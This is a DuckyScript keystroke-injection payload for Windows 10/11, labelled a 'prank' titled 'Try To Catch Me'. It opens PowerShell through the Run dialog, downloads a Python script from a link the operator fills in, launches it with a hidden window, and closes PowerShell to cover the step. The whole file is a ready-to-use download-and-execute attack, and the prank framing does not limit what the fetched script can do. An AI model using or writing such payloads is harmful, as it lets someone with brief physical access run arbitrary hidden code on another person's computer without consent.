REM_BLOCK
####################################
#                                  #
# Title        : Try To Catch Me   #
# Author       : Aleff             #
# Version      : 1.0               #
# Category     : Prank             #
# Target       : Windows 10/11     #
#                                  #
####################################

Requirements:
    - Python
    - Internet Connection
END_REM

REM REQUIRED - Set your Python script link
DEFINE #SCRIPT-PY-LINK example.com

DELAY 1000
GUI r
DELAY 500
STRINGLN powershell
DELAY 500

STRINGLN Invoke-WebRequest -Uri "#SCRIPT-PY-LINK" -OutFile "script.py"
DELAY 500

STRINGLN Start-Process python.exe -ArgumentList "script.py" -WindowStyle Hidden
DELAY 1000
ALT F4
